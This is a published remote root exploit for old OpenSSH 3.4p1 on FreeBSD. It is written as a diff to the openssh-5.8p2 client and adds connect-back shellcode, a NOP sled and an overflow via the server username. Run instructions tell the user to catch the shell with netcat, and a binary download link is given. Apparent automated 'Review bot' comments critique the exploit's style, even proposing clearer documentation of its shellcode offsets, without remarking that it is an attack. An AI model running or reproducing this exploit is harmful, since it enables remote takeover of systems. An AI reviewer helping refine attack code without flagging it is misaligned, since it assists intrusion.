OpenSSH FreeBSD Remote Root Exploit
By Kingcope
Year 2011
Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702
Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924
run like ./ssh -1 -z <yourip> <target>
setup a netcat, port 443 on yourip first
a statically linked linux binary of the exploit can be found below
attached is a diff to openssh-5.8p2.
the statically linked binary can be downloaded from
http://isowarez.de/ssh_0day
I know these versions are really old; some seem to run that, though.
-Cheers, King "the archaeologist" Cope
diff openssh-5.8p2/ssh.c openssh-5.8p2_2/ssh.c
149a150
> char *myip;
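Review bot: `char *myip;` is a new file-scope global with no initializer and no comment, and nothing in this patch checks it before use; the usage text added at 195a197,203 presents `-z <yourip>` as mandatory, so document that here (e.g. `char *myip = NULL; /* set by -z, required */`), because when `-z` is omitted the null pointer reaches the later `inet_addr(myip)` and `printf("... %s:443\n", myip)` calls in sshconnect1.c.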
195a197,203
> "OpenSSH FreeBSD Remote Root Exploit\n"
> "By Kingcope\n"
> "Year 2011\n\n"
> "Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n"
> "Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n"
> "run like ./ssh -1 -z <yourip> <target>\n"
> "setup a netcat, port 443 on yourip first\n\n"
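Review bot: these seven string literals duplicate, almost verbatim, the `printf` banner added to sshconnect1.c at 678a731,748, and the two copies already disagree ("OpenSSH FreeBSD Remote Root Exploit" here, "OpenSSH Remote Root Exploit" there); keep the banner in one place. The "port 443" in the last line matches the `htons(443)` patched in later but not the `PORT "\x27\x10" /* htons(10000) */` macro comment in the same patch, which is one more reason to single-source it.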
299c307
< while ((opt = getopt(ac, av, "1246ab:c:e:fgi:kl:m:no:p:qstvx"
---
> while ((opt = getopt(ac, av, "1246ab:c:e:fgi:kl:m:no:z:p:qstvx"
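Review bot: the new `z:` is spliced between `o:` and `p:`, breaking the alphabetical order the rest of the getopt string keeps; append it after `x` (or with the remaining options on the continuation line) and add `-z` to the per-flag usage list rather than only to the banner. The trailing colon is correct, since the option takes an argument.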
335a344,346
> break;
> case 'z':
> myip = optarg;
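Review bot: the inserted `case 'z':` ends with `myip = optarg;` and has no `break;` of its own; the hunk instead adds a `break;` before the case, which is only correct if the unchanged line after the insertion point (original line 336) is the `break;` of the case being split. Confirm that, otherwise this falls through into the next `case`. A one-line comment on what `-z` sets would also help, since `myip` is otherwise undocumented.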
diff openssh-5.8p2/sshconnect1.c openssh-5.8p2_2/sshconnect1.c
667a668,719
> //IP=\xc0\xa8\x20\x80
> #define IPADDR "\xc0\xa8\x20\x80"
> #define PORT "\x27\x10" /* htons(10000) */
>
> char sc[] =
> "\x90\x90"
> "\x90\x90"
> "\x31\xc9" // xor ecx, ecx
> "\xf7\xe1" // mul ecx
> "\x51" // push ecx
> "\x41" // inc ecx
> "\x51" // push ecx
> "\x41" // inc ecx
> "\x51" // push ecx
> "\x51" // push ecx
> "\xb0\x61" // mov al, 97
> "\xcd\x80" // int 80h
> "\x89\xc3" // mov ebx, eax
> "\x68"IPADDR // push dword 0101017fh
> "\x66\x68"PORT // push word 4135
> "\x66\x51" // push cx
> "\x89\xe6" // mov esi, esp
> "\xb2\x10" // mov dl, 16
> "\x52" // push edx
> "\x56" // push esi
> "\x50" // push eax
> "\x50" // push eax
> "\xb0\x62" // mov al, 98
> "\xcd\x80" // int 80h
> "\x41" // inc ecx
> "\xb0\x5a" // mov al, 90
> "\x49" // dec ecx
> "\x51" // push ecx
> "\x53" // push ebx
> "\x53" // push ebx
> "\xcd\x80" // int 80h
> "\x41" // inc ecx
> "\xe2\xf5" // loop -10
> "\x51" // push ecx
> "\x68\x2f\x2f\x73\x68" // push dword 68732f2fh
> "\x68\x2f\x62\x69\x6e" // push dword 6e69622fh
> "\x89\xe3" // mov ebx, esp
> "\x51" // push ecx
> "\x54" // push esp
> "\x53" // push ebx
> "\x53" // push ebx
> "\xb0\xc4\x34\xff"
> "\xcd\x80"; // int 80h
>
>
> extern char *myip;
>
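Review bot: several comments in `sc[]` no longer match the bytes: `"\x68"IPADDR // push dword 0101017fh` actually pushes `\xc0\xa8\x20\x80` (192.168.32.128, as the `//IP=` comment above it says), `"\x66\x68"PORT // push word 4135` pushes `\x27\x10` (the `/* htons(10000) */` value), and the `"\xb0\xc4\x34\xff"` line before the final `int 80h` has no comment at all while every other instruction does. Since the 678a731,748 hunk overwrites both slots at run time (`sc + 21` and `sc + 27`), `IPADDR` and `PORT` are placeholders only; say so in a comment and document those offsets next to the macros so anyone reordering the array knows they move. `"\x68"IPADDR` also concatenates a literal and a macro with no space, which is legal C but easy to misread.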
678a731,748
>
> char buffer[100000];
>
> printf("OpenSSH Remote Root Exploit\n");
> printf("By Kingcope\n");
> printf("Year 2011\n\n");
> printf("Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n");
> printf("Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n");
> printf("Connect back to: %s:443\n", myip);
>
> *((unsigned long*)(sc + 21)) = inet_addr(myip);
> *((unsigned short*)(sc + 27)) = htons(443);
>
> memset(buffer, 'V', 8096);
> memcpy(buffer+24, "\x6b\x4b\x0c\x08", 4); // SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702
> memset(buffer+28, '\x90', 65535);
> memcpy(buffer+28+65535, sc, sizeof(sc));
> server_user=buffer;
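Review bot: the magic numbers here are undocumented and partly contradictory. `memset(buffer, 'V', 8096)` is almost entirely overwritten by the `memset(buffer+28, '\x90', 65535)` that follows, so only 24 bytes of `'V'` survive and the 8096 is misleading; `buffer[100000]` is also a 100 KB array placed on the stack of a function that previously had none. The `memcpy(buffer+24, "\x6b\x4b\x0c\x08", 4)` comment tags the value for `FreeBSD-20020702` only, while the `printf` lines two lines up (and the banner in ssh.c) claim `FreeBSD-20030924` as well; either state that one value serves both or document the discrepancy. `server_user=buffer;` silently discards whatever `server_user` pointed to before, and `inet_addr`/`htons` rely on headers sshconnect1.c already pulls in rather than anything this hunk adds. Finally, `sizeof(sc)` deliberately includes the string literal's terminating NUL, which is what keeps `buffer` a valid C string; a comment saying so will stop someone "fixing" it to `strlen(sc)`.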